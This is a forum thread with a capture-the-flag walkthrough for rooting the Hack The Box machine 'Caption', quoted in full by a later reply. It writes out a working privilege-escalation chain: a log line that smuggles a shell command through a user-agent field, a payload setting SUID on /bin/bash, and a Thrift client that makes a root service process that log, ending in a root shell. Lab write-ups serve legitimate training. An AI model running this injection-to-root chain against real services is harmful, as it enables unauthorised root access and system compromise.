Root Flag Caption HTB
by Holz - Friday September 20, 2024 at 08:03 PM
#1
ssh -i id_ecdsa -L 9090:127.0.0.1:9090 margo@caption.htb
 
CREATE THESE FILES ON TARGET MACHINE
--
nano /tmp/malicious.log
127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"
 
nano /tmp/payload.sh
chmod +s /bin/bash
 
 
CREATE THIS FILE ON LOCAL MACHINE
---
nano log_service.thrift
 
namespace go log_service
 
// RPC interface the client stubs are generated from: a single method that
// takes a file path and returns a string.
service LogService {
    // filePath is an unconstrained string supplied by the caller; nothing in
    // the interface limits which file the server is asked to read.
    string ReadLogFile(1: string filePath)
}
 
INSTALL THRIFT ON LOCAL MACHINE: sudo apt install python3-thrift
 
thrift -r --gen py log_service.thrift
cd gen-py
 
CREATE FILE ON LOCAL MACHINE:
client.py
 
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService  # Import generated Thrift client code
 
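def main():
    """Call ``LogService.ReadLogFile`` once over Thrift and print the reply.

    Connects to ``localhost:9090`` using a buffered socket transport and the
    binary protocol, sends a single hard-coded file path, and prints the
    string the server returns. Thrift errors are printed to stdout instead
    of being raised.

    NOTE(review): the request carries nothing but a caller-chosen path, so
    which file gets opened and how its contents are handled is decided
    entirely on the server. A service exposing this method should confine
    the path to its own log directory and never interpolate fields taken
    from a log line into a shell command.
    """
    # Buffered transport over a plain TCP socket, binary wire protocol.
    transport = TTransport.TBufferedTransport(TSocket.TSocket('localhost', 9090))
    client = LogService.Client(TBinaryProtocol.TBinaryProtocol(transport))

    try:
        # open() sits inside the try so a refused connection is reported
        # like any other Thrift error rather than as a raw traceback.
        transport.open()

        log_file_path = "/tmp/malicious.log"
        response = client.ReadLogFile(log_file_path)
        print("Server response:", response)
    except Thrift.TException as tx:
        print(f"Thrift exception: {tx}")
    finally:
        # Release the socket on every path, including when an exception
        # that is not a TException propagates out of the call.
        if transport.isOpen():
            transport.close()


if __name__ == '__main__':
    main()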


run script: python3 client.py    

GO TO TARGET MACHINE AND run /bin/bash -p
 cat /root/root.txt
#2
ez ctf, great work, i will probably make a thread like this too

#3
thanks for the write up dude !

#4
(Sep 20, 2024, 08:03 PM)Holz Wrote: ssh -i id_ecdsa -L 9090:127.0.0.1:9090 margo@caption.htb
 
CREATE THESE FILES ON TARGET MACHINE
--
nano /tmp/malicious.log
127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"
 
nano /tmp/payload.sh
chmod +s /bin/bash
 
 
CREATE THIS FILE ON LOCAL MACHINE
---
nano log_service.thrift
 
namespace go log_service
 
// RPC interface the client stubs are generated from: a single method that
// takes a file path and returns a string.
service LogService {
    // filePath is an unconstrained string supplied by the caller; nothing in
    // the interface limits which file the server is asked to read.
    string ReadLogFile(1: string filePath)
}
 
INSTALL THRIFT ON LOCAL MACHINE: sudo apt install python3-thrift
 
thrift -r --gen py log_service.thrift
cd gen-py
 
CREATE FILE ON LOCAL MACHINE:
client.py
 
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService  # Import generated Thrift client code
 
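def main():
    """Call ``LogService.ReadLogFile`` once over Thrift and print the reply.

    Connects to ``localhost:9090`` using a buffered socket transport and the
    binary protocol, sends a single hard-coded file path, and prints the
    string the server returns. Thrift errors are printed to stdout instead
    of being raised.

    NOTE(review): the request carries nothing but a caller-chosen path, so
    which file gets opened and how its contents are handled is decided
    entirely on the server. A service exposing this method should confine
    the path to its own log directory and never interpolate fields taken
    from a log line into a shell command.
    """
    # Buffered transport over a plain TCP socket, binary wire protocol.
    transport = TTransport.TBufferedTransport(TSocket.TSocket('localhost', 9090))
    client = LogService.Client(TBinaryProtocol.TBinaryProtocol(transport))

    try:
        # open() sits inside the try so a refused connection is reported
        # like any other Thrift error rather than as a raw traceback.
        transport.open()

        log_file_path = "/tmp/malicious.log"
        response = client.ReadLogFile(log_file_path)
        print("Server response:", response)
    except Thrift.TException as tx:
        print(f"Thrift exception: {tx}")
    finally:
        # Release the socket on every path, including when an exception
        # that is not a TException propagates out of the call.
        if transport.isOpen():
            transport.close()


if __name__ == '__main__':
    main()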


run script: python3 client.py    

GO TO TARGET MACHINE AND run /bin/bash -p
 cat /root/root.txt

THANKS FOR SHARE :) ty
